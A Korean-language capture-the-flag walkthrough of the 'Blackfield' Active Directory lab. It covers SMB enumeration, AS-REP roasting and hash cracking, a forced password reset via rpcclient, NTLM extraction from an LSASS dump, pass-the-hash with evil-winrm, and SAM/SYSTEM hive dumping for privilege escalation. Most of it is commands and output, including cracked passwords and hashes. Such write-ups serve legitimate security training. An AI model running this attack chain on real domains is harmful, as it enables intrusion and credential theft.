1. 정찰
1.1. nmap
Windows AD 환경임을 확인했다. 특별히 의심되는 포트는 발견하지 못했다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# nmap -sC -sV 10.129.44.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-23 15:45 +04
Nmap scan report for 10.129.44.77
Host is up (0.19s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-23 18:45:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn?
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2025-12-23T18:46:05
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.21 seconds
1.2. 실패한 정찰
smbmap 을 통해 정찰했을 때 접근에 실패하는 모습을 볼 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbmap -H 10.129.44.77
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.44.77, no fun for you...
[*] Closed 1 connections
1.3. smbclient를 이용한 공유폴더 확인
공유폴더를 확인했다. 그 중에서 profiles$ 폴더를 확인할 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient -N -L //10.129.44.77
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.44.77 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
1.4. profiles$ 폴더 탐색
해당 폴더를 탐색하면 계정명으로 보이는 여러 폴더들을 찾을 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient //10.129.44.77/profiles$
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 20:47:12 2020
.. D 0 Wed Jun 3 20:47:12 2020
AAlleni D 0 Wed Jun 3 20:47:11 2020
ABarteski D 0 Wed Jun 3 20:47:11 2020
ABekesz D 0 Wed Jun 3 20:47:11 2020
ABenzies D 0 Wed Jun 3 20:47:11 2020
ABiemiller D 0 Wed Jun 3 20:47:11 2020
AChampken D 0 Wed Jun 3 20:47:11 2020
ACheretei D 0 Wed Jun 3 20:47:11 2020
[...SNIP...]
내부를 탐색하면 아무것도 들어있지 않다. 용도라고는 그저 ID 를 알아내는 정도로만 쓸 수 있을 것 같다.
smb: \> recurse ON
smb: \> ls
. D 0 Wed Jun 3 20:47:12 2020
.. D 0 Wed Jun 3 20:47:12 2020
AAlleni D 0 Wed Jun 3 20:47:11 2020
ABarteski D 0 Wed Jun 3 20:47:11 2020
ABekesz D 0 Wed Jun 3 20:47:11 2020
ABenzies D 0 Wed Jun 3 20:47:11 2020
ABiemiller D 0 Wed Jun 3 20:47:11 2020
[...SNIP...]
1.5. users 파일 생성
계정이 지나치게 많으므로, 이를 한 번에 users 파일로 만들 수 있는 명령어가 필요하다. 그래서 해당 폴더를 /mnt 에 마운트를 시킨다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# mount -t cifs //10.129.44.77/profiles$ /mnt
Password for root@//10.129.44.77/profiles$:
그 다음에 users.old 파일에다가 해당 내용들을 저장한다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# mv users users.old; ls -1 /mnt/ > users
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# ls
user users users.old
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# cat users.old
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
[...SNIP...]
1.6. ID/PW 일치 여부 확인
nxc 를 이용해서 ID/PW가 일치하는 계정이 존재하는지 먼저 식별한다. 그 중에 AAlleni 계정에 대해서 ID/PW가 같음을 확인했다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc smb 10.129.44.77 -u users.old -p users.old --shares
SMB 10.129.44.77 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.44.77 445 DC01 [+] BLACKFIELD.local\AAlleni:AAlleni (Guest)
SMB 10.129.44.77 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
하지만 해당 계정을 통해서 할 수 있는 것이 마땅히 없다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# smbclient -L //10.129.44.77/ -U AAlleni%AAlleni
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.44.77 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
1.7. GetNPUsers 를 이용한 접근 가능성 체크
ID 만 가지고 할 수 있는 것은 제한적이라 GetNPUsers 를 통해서 체크한다. 그 중에 support 계정의 해쉬를 반환받을 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# impacket-GetNPUsers 'BLACKFIELD.LOCAL/' -usersfile users.old -outputfile hash -dc-ip 10.129.44.77
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...SNIP...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a88337a1d278499bd271450a$fdae867559c60e8d7d5f6c84775a9dc2374ded18870f64bfd6d8dae2c26753137d041e698a029bcc63db045eda4a864a973f240788e4d9d6172cc09aba3d49353d319e4b46d03cfcadc657888a6ae157daa16c9bc4e37bef610904f131d45b7ad01fae2e895ece77a199ad4ded9d76a71a15eca28dca5795bc4820c4a3bcfbaffb00602cee258086738e81f4de3c9706b5966e07fb18d40c2ce52f1f819c8279e91330de5c10dc6c00a98b0eb8cdc76270e7377ca5136b3a739b2006624c0a8d0f8308f081b55128ee39d72fef1ecd6421297573ef4ce0cdc9700eee017fe593eb034091005602b4b7f5d9bb0264f7e5b0e95aca
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...SNIP...]
해당 해쉬를 복호화 했을 때 #00^BlackKnight 의 비밀번호를 얻을 수 있었다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
$krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a88337a1d278499bd271450a$fdae867559c60e8d7d5f6c84775a9dc2374ded18870f64bfd6d8dae2c26753137d041e698a029bcc63db045eda4a864a973f240788e4d9d6172cc09aba3d49353d319e4b46d03cfcadc657888a6ae157daa16c9bc4e37bef610904f131d45b7ad01fae2e895ece77a199ad4ded9d76a71a15eca28dca5795bc4820c4a3bcfbaffb00602cee258086738e81f4de3c9706b5966e07fb18d40c2ce52f1f819c8279e91330de5c10dc6c00a98b0eb8cdc76270e7377ca5136b3a739b2006624c0a8d0f8308f081b55128ee39d72fef1ecd6421297573ef4ce0cdc9700eee017fe593eb034091005602b4b7f5d9bb0264f7e5b0e95aca:#00^BlackKnight
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a883...e95aca
Time.Started.....: Wed Dec 24 08:58:18 2025 (5 secs)
Time.Estimated...: Wed Dec 24 08:58:23 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3216.6 kH/s (0.50ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> #!hrvert
Hardware.Mon.#1..: Util: 84%
[...SNIP...]
SMB 를 통해 공유 폴더를 체크했으나 별도로 특이한 점이 없었다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc smb 10.129.44.77 -u support -p '#00^BlackKnight' --shares
SMB 10.129.44.77 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.44.77 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.129.44.77 445 DC01 [*] Enumerated shares
SMB 10.129.44.77 445 DC01 Share Permissions Remark
SMB 10.129.44.77 445 DC01 ----- ----------- ------
SMB 10.129.44.77 445 DC01 ADMIN$ Remote Admin
SMB 10.129.44.77 445 DC01 C$ Default share
SMB 10.129.44.77 445 DC01 forensic Forensic / Audit share.
SMB 10.129.44.77 445 DC01 IPC$ READ Remote IPC
SMB 10.129.44.77 445 DC01 NETLOGON READ Logon server share
SMB 10.129.44.77 445 DC01 profiles$ READ
SMB 10.129.44.77 445 DC01 SYSVOL READ Logon server share
2. 내부망 침투
2.1. 의심스러운 계정 식별
nxc 를 통해 ldap 으로 확인해 보면 audit2020 이라는 계정이 BadPW 에 대해 3의 값, 즉 비밀번호를 세 번 틀렸다는 기록을 갖고 있다. 해당 계정이 좀 의심스럽다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc ldap 10.129.44.77 -u support -p '#00^BlackKnight' --users
LDAP 10.129.44.77 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP 10.129.44.77 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.129.44.77 389 DC01 [*] Enumerated 315 domain users: BLACKFIELD.local
LDAP 10.129.44.77 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.44.77 389 DC01 Administrator 2020-02-23 22:09:53 0 Built-in account for administering the computer/domain
LDAP 10.129.44.77 389 DC01 Guest 2020-06-03 20:18:28 0 Built-in account for guest access to the computer/domain
LDAP 10.129.44.77 389 DC01 krbtgt 2020-02-23 22:08:31 0 Key Distribution Center Service Account
LDAP 10.129.44.77 389 DC01 audit2020 2020-09-22 02:35:06 3
LDAP 10.129.44.77 389 DC01 support 2020-02-23 21:53:23 0
[...SNIP...]
2.2. BloodHound 를 통한 내부망 관계도 확인
Bloodhound-python 을 통해서 AD 정보들을 수집한다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.129.44.77
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
[...SNIP...]
아까 audit2020 의 계정이 의심스럽다고 했고, 현재 확보한 계정인 support 에 대해서는 ForceChangePassword 라는 권한이 존재한다. 즉, support 계정이 audit2020 계정을 강제로 비밀번호를 변경할 수 있는 것이다.
2.3. rpcclient 를 이용한 audit2020 계정 비밀번호 변경
rpcclient 에서 지원하는 명령어인 setuserinfo2 를 이용해서 비밀번호를 변경할 수 있다. 23 이라는 옵션은 왜 쓰는지 모른다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# rpcclient -U "support"%"#00^BlackKnight" 10.129.44.77
rpcclient $> 10.129.44.77
command not found: 10.129.44.77
rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 audit2020 23 'test123!'
rpcclient $>
비밀번호를 변경한 audit2020 계정으로 smbmap 을 통해 공유 폴더를 확인한다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbmap -H 10.129.44.77 -u audit2020 -p 'test123!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.44.77:445 Name: 10.129.44.77 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
2.4. 공유 폴더를 이용해 내부 자료 수집
forensic 폴더에 대해서 READ 권한이 있음을 확인하고 무슨 데이터가 있는지 식별한다. 그 중에 commands_output 폴더 내부에 domain_admins.txt 가 눈에 들어온다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient //10.129.44.77/forensic -U audit2020%test123!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 17:03:16 2020
.. D 0 Sun Feb 23 17:03:16 2020
commands_output D 0 Sun Feb 23 22:14:37 2020
memory_analysis D 0 Fri May 29 00:28:33 2020
tools D 0 Sun Feb 23 17:39:08 2020
5102079 blocks of size 4096. 1671250 blocks available
smb: \> recurse ON
smb: \> ls
. D 0 Sun Feb 23 17:03:16 2020
.. D 0 Sun Feb 23 17:03:16 2020
commands_output D 0 Sun Feb 23 22:14:37 2020
memory_analysis D 0 Fri May 29 00:28:33 2020
tools D 0 Sun Feb 23 17:39:08 2020
\commands_output
. D 0 Sun Feb 23 22:14:37 2020
.. D 0 Sun Feb 23 22:14:37 2020
domain_admins.txt A 528 Sun Feb 23 17:00:19 2020
domain_groups.txt A 962 Sun Feb 23 16:51:52 2020
domain_users.txt A 16454 Sat Feb 29 02:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 16:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 16:50:28 2020
netstat.txt A 3842 Sun Feb 23 16:51:01 2020
route.txt A 3976 Sun Feb 23 16:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 16:56:59 2020
tasklist.txt A 9990 Sun Feb 23 16:54:29 2020
[...SNIP...]
해당 파일을 확인해 보면 administrator 의 크리덴셜로 보이는 무엇인가 있지만 쓸모는 별로 없다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# cat domain_admins.txt
��Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.
다른 파일인 memory_analysis 폴더의 lsass.zip 을 수집할 수 있었다. 이는 LSASS 의 메모리 전체를 덤프한 파일이다. 이걸 통해서 NTLM등의 자료를 얻을 수 있다. 해당 파일을 다운로드 하는 데에 smbclient 를 이용하면 파일 용량이 너무 커서 중간에 끊기기 때문에 마운트 해서 다운로드를 진행했다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# mount -t cifs //10.129.44.77/forensic /mnt/ -o user=audit2020,password='test123!'
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# cp /mnt/memory_analysis/lsass.zip /home/kali/labs/Blackfield/
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
2.5. lsass.dmp 파일 분석
해당 파일을 분석하면 다양한 계정들의 NTLM 해쉬를 추출할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
[...SNIP...]
해당 해쉬를 추출하고 svc_backup 계정으로 해쉬를 통해 로그인 하니 정상적으로 쉘을 획득하고 user.txt 파일을 얻을 수 있음을 확인했다.
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type C:\Users\svc_backup\Desktop\user.txt
administrator 를 통해서 로그인을 시도했으나 정상적으로 되지 않음을 확인했다.
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
3. 권한 상승
3.1. svc_backup 권한 확인
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
*Evil-WinRM* PS C:\Users\svc_backup\Documents> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 9:54:48 AM
Password expires Never
Password changeable 2/24/2020 9:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/23/2020 10:03:50 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
3.2. secretsdump 이용 administrator 계정 접근 시도
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download sam
Info: Downloading C:\Users\svc_backup\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system
Info: Downloading C:\Users\svc_backup\Documents\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
안 됨
┌──(root㉿kali)-[/home/kali]
└─# impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u administrator -H 67ef902eae0d740df6257f273de75051
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt